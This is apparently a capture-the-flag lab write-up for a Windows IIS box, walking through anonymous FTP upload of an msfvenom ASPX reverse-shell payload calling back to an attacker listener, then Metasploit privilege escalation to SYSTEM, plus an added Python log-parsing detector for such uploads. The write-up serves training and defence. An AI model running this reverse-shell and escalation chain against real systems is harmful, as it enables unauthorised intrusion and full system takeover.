devel

RECON

IIS Server (Windows)

Nmap Scan

nmap -p- -A -T4 10.10.10.5

-p- scans all ports, -A enables OS and version detection, -T4 uses the aggressive timing template

Port 21 allows for anonymous FTP Login

ENUMERATION

FTP Login

User: anonymous
Pass: anonymous

The connection allows files to be uploaded

Msfvenom Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f aspx > ex.aspx

Metasploit Listener

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.9

FTP Upload

binary

Binary mode is more reliable than ASCII mode, which can alter the file's bytes in transit

put ex.aspx

Uploads the file to 10.10.10.5/ex.aspx
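
From the defender's side, the steps above leave a clear trail: an anonymous FTP STOR of a script file, followed by an HTTP request for the same path. The Python below is an added example, not part of the original write-up; the log lines are constructed, and the field layout, the anonymous account names and the FTP root being the web root are assumptions.

```python
import os

# Constructed sample logs (W3C extended format; field layout is an assumption).
FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-01 10:00:02 10.10.14.9 anonymous PASS - 230
2024-01-01 10:00:09 10.10.14.9 anonymous STOR /ex.aspx 226
2024-01-01 10:05:00 192.0.2.7 webadmin STOR /index.html 226
"""
HTTP_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:30 10.10.14.9 GET /ex.aspx 200
2024-01-01 10:06:00 192.0.2.50 GET /index.html 200
"""
SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx"}  # extensions IIS may execute
ANON_USERS = {"anonymous", "ftp"}  # assumed anonymous account names

def parse_w3c(text):
    """Yield one dict per record, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def find_uploaded_scripts(ftp_log, http_log):
    """Return script files stored via anonymous FTP, with any later HTTP requesters."""
    uploads = {}
    for r in parse_w3c(ftp_log):
        path = r.get("cs-uri-stem", "").lower()
        ext = os.path.splitext(path)[1]
        if (r.get("cs-method") == "STOR" and r.get("sc-status") == "226"
                and r.get("cs-username", "").lower() in ANON_USERS
                and ext in SCRIPT_EXTS):
            uploads[path] = {"path": path, "uploader": r["c-ip"],
                             "stored": r["date"] + " " + r["time"], "requested_by": []}
    for r in parse_w3c(http_log):
        hit = uploads.get(r.get("cs-uri-stem", "").lower())
        if hit and r["date"] + " " + r["time"] >= hit["stored"]:
            hit["requested_by"].append(r["c-ip"])
    return list(uploads.values())

if __name__ == "__main__":
    for alert in find_uploaded_scripts(FTP_LOG, HTTP_LOG):
        print(alert)
```

An entry with a non-empty requested_by list means the uploaded script was also fetched over HTTP, which is the point at which it would have executed.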

PRIVILEGE ESCALATION

Meterpreter session

getuid

Accessing the webpage provides a session to the application server

Exploit suggester

background
use post/multi/recon/local_exploit_suggester
set session 1
run

Exploit list

13 possible exploits found

Exploit

use exploit/windows/local/ms10_015_kitrap0d
set options
run

Creates a new session with SYSTEM privileges

Root shell

shell

Flags for user and root on desktop
